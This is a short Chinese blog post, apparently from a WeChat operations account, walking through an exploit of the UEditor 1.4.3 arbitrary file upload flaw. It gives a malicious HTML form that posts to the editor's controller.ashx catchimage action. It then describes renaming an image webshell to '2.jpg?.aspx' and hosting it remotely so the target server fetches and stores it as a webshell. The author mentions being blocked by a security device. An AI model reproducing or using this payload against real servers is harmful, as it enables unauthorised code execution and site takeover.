今天测试一个项目,进到后台之后发现使用富文本web编辑器

UEditor 1.4.3 任意文件上传漏洞 Safe 第1张

SRE实战 互联网时代守护先锋,助力企业售后服务体系运筹帷幄!一键直达领取阿里云限量特价优惠。


构造一个恶意的html文件,方便我们传输数据过去: xxxx为攻击地址

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

然后制作一个图片马,文件名改为2.jpg?.aspx上传至自己的服务器,通过构造的恶意html进行上传

UEditor 1.4.3 任意文件上传漏洞 Safe 第2张

我的被安全设备拦截了

UEditor 1.4.3 任意文件上传漏洞 Safe 第3张


看看别人成功的案例

UEditor 1.4.3 任意文件上传漏洞 Safe 第4张

扫码关注我们
微信号:SRE实战
拒绝背锅 运筹帷幄